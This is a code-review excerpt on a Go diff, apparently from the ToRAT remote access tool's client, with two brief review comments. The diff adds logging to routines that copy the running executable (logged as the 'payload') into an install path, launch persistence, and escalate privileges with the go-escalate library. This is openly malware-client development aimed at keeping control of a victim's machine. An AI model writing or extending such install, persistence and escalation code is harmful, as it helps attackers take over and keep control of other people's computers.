torat_client/setup.go

```diff
@@ -12,55 +12,74 @@ import (
 	"github.com/lu4p/go-escalate"
 )
 
-func copyExecuteable() error {
-	log.Println("copyExecuteable")
+// Setup add Persitence
+func SetupDaemon() {
+	log.Println("[SetupDaemon] Passing off to Daemon installer...")
+	go Persist(PathExe)
+}
 
+func installExecuteable() error {
 	if err := os.RemoveAll(Path); err != nil {
+		log.Println("[InstallExe] [!] Could NOT remove old executeable: ", err)
 		return err
 	}
-
-	log.Println("Removed Old Executeable")
+	log.Println("[InstallExe] Removed old executeable before install")
 
 	ex, err := os.Executable()
 	if err != nil {
+		log.Println("[InstallExe] [!] Couldn't find the currently running exe: ", err)
 		return err
 	}
 
 	data, err := ioutil.ReadFile(ex)
 	if err != nil {
+		log.Println("[InstallExe] [!] Could not read current exe: ", err)
 		return err
 	}
 
 	if err = os.MkdirAll(Path, os.ModePerm); err != nil {
+		log.Println("[InstallExe] [!] Could not create path for new exe: ", err)
+		return err
+	}
+
+	if err = ioutil.WriteFile(PathExe, data, os.ModePerm); err != nil {
+		log.Println("[InstallExe] [!] Could not write exe to path: ", err)
 		return err
 	}
 
-	return ioutil.WriteFile(PathExe, data, os.ModePerm)
+	return nil
 }
 
 // Elevate elevate task
 func Elevate() error {
-	log.Println("Elevate")
-	err := copyExecuteable()
+	log.Println("[Elevate] Installing payload into: ", PathExe)
+
+	err := installExecuteable()
 	if err != nil {
-		return errors.New("copy failed")
+		return errors.New("[Elevate] [!] Could NOT copy payload into target path")
+	} else {
+		log.Println("[Elevate] [+] Successfully copied payload into target path")
 	}
+
+	// Escalate exe and return
 	return escalate.Escalate(PathExe)
 }
 
 // CheckSetup check wheter already configured
-func CheckSetup() bool {
-	log.Println("CheckSetup")
+func CheckExisting() bool {
+	log.Println("[CheckExisting] Am I the existing install?")
```

Comment:
This is unnecessary we really only care about the answer.

Reply:
Okay, kind of hard what you want me to keep and remove but this is an easy fix.